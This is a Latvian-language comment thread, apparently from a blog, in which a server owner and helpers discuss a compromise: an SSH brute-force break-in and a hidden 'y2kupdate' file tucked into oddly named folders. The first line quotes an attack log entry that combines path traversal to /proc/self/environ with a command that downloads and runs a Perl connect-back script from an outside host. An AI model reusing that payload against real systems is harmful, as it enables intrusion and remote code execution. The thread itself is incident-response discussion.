94.199.181.165 – – [22/Jun/2010:21:21:08 +0300] “GET /index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1” 404 207 “-” “https://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget
Nez kāpēc mani tas pavisam galīgi neuztrauc 😀
Man tiešām grūti iedomāties, cik šķībai tādā gadījumā ir jābūt servera konfigurācijai, lai šitas varētu reāli nostrādāt 😀
Apache un PHP jau pat defaultā konfigurācija, neko šitādu domājams, nepieļauj.
Paldies par info, drono! 🙂
Tiešām, izskatās, ka tas nebūs bijis caurums webā, bet gan veiksmīgs bruteforce. Paskatijos logos (p.s. – neviens jau nevarēja pateikt par tāda auth.log esamību, ne? 😀 ), atradu ka esmu periodiski bruteforcots, tikai grūti pateikt vai no viena cilvēka, jo ip adreses mainās. Š odien pat bruterforcošanās turpinājās, taču nobloķējot divas ip adreses, itkā viss beidzās ( un anyway, kopš vakardienas vai aizvakardienas ssh ir tikai man un tikai no natotās ip adreses ), taka tas tā. Esmu ticis logos līdz vietai, kur tika nomainītas paroles, tikai neesmu drošs vai čalis ir ticis, pie tām roota privilēģijām vai nav, kaut kādi su mājieni logos parādās, taču nemāku tos logus saprast, tapēc moš iesviedīšu to logu – Spiest šeit
Tālāk par to y2kupdate failu, joprojām netieku viņam klāt. Komanda “find / -name y2kupdate” atgriež rezultātu “/home/jurists2/ /. /y2kupdate”, taču aiz /home/jurists2/ ir atstarpe, kā arī aiz /. ir atstarpe, līdz ar to es nemāku tikt līdz tam failam, lai viņu nahrenizētu. Any ideas?
Pieņemu ka epasti no kontiem, kuriem tika nomainītas paroles arī ir aizpludināti uz kādiem krievzemes serveriem.
Lai vai kā, silti ieteiktu mc jeb Midnight Commander:
sudo apt-get install mc
Terminālī atver ar komandu “mc”, tad atrodi savu home folderi (/home/jurists2/) un pirmā mape ar tukšo nosaukumu – vari paskatīties, kas tajā iekšā, vai uzreiz atzīmē to un nospied F8.
Teorētiski vajadzētu strādāt, jo es nupat arī izmēģināju uz savas sistēmas – Ubuntu ļauj izveidot mapes ar atstarpēm nosaukumos (” “) vai kā punktu (“.”), bet terminālī tādas izdzēst nav tik vienkārši (vismaz es neprotu).
P.S. Baigi labs raksts bija sanācis par tiem fočikiem. 😉
Ok, tad izdevās tikt klāt tai mapei. Atverot kuru atradu dažādus failus. Pašu y2kupdate failu neapdomīgi uzreiz izdzēsu. 🙁 Pārējos par laimi saglabāju. Ja kāds vēlas uzmest aci tiem – Spiest šeit
Un paldies pašam! 🙂
Jā, izskatās, ka kāds skriptu bērniņšou kei
Un par to root’u – grūti teikt, tas atkarīgs no tā, kāds īsti bija intrūdera mērķis, bet es šaubos vai jamais tiešām būtu līdz tam ticis.
Drošības pēc vari jau vēl pārmeklēt visu cietni:
sudo find / -iname ‘y2k*’
,
bet tas varētu aizņemt diezgan daudz laika, atkarībā no sistēmā esošo failu daudzuma.
Preses relīzes